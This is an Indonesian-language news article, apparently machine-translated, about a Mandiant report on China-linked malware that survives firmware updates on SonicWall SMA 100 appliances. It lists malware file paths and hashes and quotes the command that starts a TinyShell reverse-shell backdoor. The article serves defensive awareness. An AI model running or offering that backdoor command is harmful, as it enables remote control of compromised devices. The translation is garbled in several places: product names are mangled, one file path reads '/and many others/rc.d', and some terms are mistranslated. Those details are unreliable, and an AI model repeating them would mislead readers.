Malware yang menginfeksi alat keamanan yang banyak digunakan bertahan dari pembaruan firmware
Pelaku ancaman dengan koneksi ke pemerintah China menginfeksi alat keamanan yang banyak digunakan dari SonicWall dengan malware yang tetap aktif bahkan setelah perangkat menerima pembaruan firmware, kata peneliti.
Safe Cellular Entry 100 dari SonicWall adalah alat akses jarak jauh yang aman yang membantu organisasi menyebarkan tenaga kerja jarak jauh dengan aman. Pelanggan menggunakannya untuk memberikan kontrol akses granular kepada pengguna jarak jauh, menyediakan koneksi VPN ke jaringan organisasi, dan mengatur profil unik untuk setiap karyawan. Akses yang dimiliki SMA 100 ke jaringan pelanggan menjadikannya goal yang menarik bagi pelaku ancaman.
Pada tahun 2021, perangkat tersebut diserang oleh peretas canggih yang mengeksploitasi apa yang saat itu merupakan kerentanan zero-day. Peralatan keamanan dari Fortinet dan Pulse Safe telah mengalami serangan serupa dalam beberapa tahun terakhir.
Mendapatkan persistensi jangka panjang di dalam jaringan
Pada hari Kamis, firma keamanan Mandiant menerbitkan sebuah laporan yang mengatakan aktor ancaman dengan dugaan hubungan ke China terlibat dalam kampanye untuk mempertahankan kegigihan jangka panjang dengan menjalankan malware pada peralatan SMA SonicWall yang belum ditambal. Kampanye tersebut terkenal karena kemampuan malware untuk tetap berada di perangkat bahkan setelah firmware-nya menerima firmware baru.
“Para penyerang berusaha keras untuk stabilitas dan kegigihan peralatan mereka,” tulis peneliti Mandiant Daniel Lee, Stephen Eckels, dan Ben Learn. “Ini memungkinkan akses mereka ke jaringan untuk bertahan melalui pembaruan firmware dan mempertahankan pijakan di jaringan melalui Perangkat SonicWall.”
Untuk mencapai kegigihan ini, malware memeriksa pemutakhiran firmware yang tersedia setiap 10 detik. Saat pembaruan tersedia, malware menyalin file yang diarsipkan untuk cadangan, membuka ritsletingnya, memasangnya, lalu menyalin seluruh paket file berbahaya ke dalamnya. Malware juga menambahkan pengguna root backdoor ke file yang dipasang. Kemudian, malware meng-rezip file tersebut sehingga siap untuk diinstal.
“Tekniknya tidak terlalu canggih, tetapi menunjukkan upaya yang cukup besar dari pihak penyerang untuk memahami siklus pembaruan alat, kemudian mengembangkan dan menguji metode untuk kegigihan,” tulis para peneliti.
Teknik persistensi konsisten dengan kampanye serangan pada tahun 2021 yang menggunakan 16 kelompok malware untuk menginfeksi perangkat Pulse Safe. Mandiant mengaitkan serangan itu dengan beberapa kelompok ancaman, termasuk yang dilacak sebagai UNC2630, UNC2717, yang menurut perusahaan mendukung “prioritas utama pemerintah China”. Mandiant mengaitkan serangan yang sedang berlangsung terhadap pelanggan SonicWall SMA 100 ke grup yang dilacak sebagai UNC4540.
“Dalam beberapa tahun terakhir penyerang China telah menyebarkan beberapa eksploitasi zero-day dan malware untuk berbagai peralatan jaringan yang terhubung ke Web sebagai rute untuk intrusi perusahaan penuh, dan contoh yang dilaporkan di sini adalah bagian dari pola terbaru yang diharapkan Mandiant untuk dilanjutkan di dalam waktu dekat,” tulis para peneliti Mandiant dalam laporan Kamis.
Akses yang sangat istimewa
Tujuan utama malware tampaknya mencuri kata sandi yang di-hash secara kriptografis untuk semua pengguna yang masuk. Itu juga menyediakan shell internet yang dapat digunakan aktor ancaman untuk menginstal malware baru.
“Analisis perangkat yang dikompromikan mengungkapkan kumpulan file yang memberi penyerang akses yang sangat istimewa dan tersedia ke alat tersebut,” tulis para peneliti dalam laporan Kamis. “Malware terdiri dari serangkaian skrip bash dan biner ELF tunggal yang diidentifikasi sebagai varian TinyShell. Perilaku keseluruhan rangkaian skrip bash berbahaya menunjukkan pemahaman mendetail tentang alat dan disesuaikan dengan baik ke sistem untuk memberikan stabilitas dan kegigihan.”
Daftar malware adalah:
| Jalur | Hash | Fungsi |
| /bin/firewalld.conf | e4117b17e3d14fe64f45750be71dbaa6 | Proses malware utama |
| /bin/httpsd | 2d57bcb8351cf2b57c4fd2d1bb8f862e | Pintu belakang TinyShell |
| /and many others/rc.d/rc.native | 559b9ae2a578e1258e80c45a5794c071 | Persistensi boot untuk firewalld |
| /bin/iptabled | 8dbf1effa7bc94fc0b9b4ce83dfce2e6 | Proses malware utama yang berlebihan |
| /bin/geoBotnetd | 619769d3d40a3c28ec83832ca521f521 | Skrip pintu belakang firmware |
| /bin/ifconfig6 | fa1bf2e427b2defffd573854c35d4919 | Skrip shutdown yang anggun |
Laporan itu berlanjut:
Titik masuk utama malware adalah skrip bash bernama
firewalldyang mengeksekusi loop utamanya satu kali untuk menghitung setiap file di sistem yang dikuadratkan: …for j in $(ls / -R) do for i in $(ls / -R) do:… Skrip bertanggung jawab untuk menjalankan perintah SQL untuk menyelesaikan pencurian kredensial dan eksekusi komponen lainnya.Fungsi pertama di
firewalldmengeksekusi pintu belakang TinyShellhttpsddengan perintahnohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &jikahttpsdproses belum berjalan. Ini mengatur TinyShell ke mode reverse-shell, menginstruksikannya untuk memanggil alamat IP dan port yang disebutkan di atas pada waktu dan hari tertentu yang diwakili oleh-mbendera, dengan interval suar yang ditentukan oleh-dbendera. Biner menyematkan alamat IP berkode keras, yang digunakan dalam mode shell terbalik jika argumen alamat IP dibiarkan kosong. Ini juga memiliki mode binding shell yang tersedia.
Para peneliti mengatakan mereka tidak tahu apa vektor infeksi awalnya.
Pekan lalu, SonicWall menerbitkan sebuah penasehat yang mendesak pengguna SMA 100 untuk meningkatkan ke versi 10.2.1.7 atau lebih tinggi. Versi tersebut mencakup penyempurnaan seperti Pemantauan Integritas File dan identifikasi proses anomali. Tambalan tersedia di sini. Pengguna juga harus secara teratur meninjau log untuk tanda-tanda penyusupan, termasuk login yang tidak regular atau lalu lintas inner.
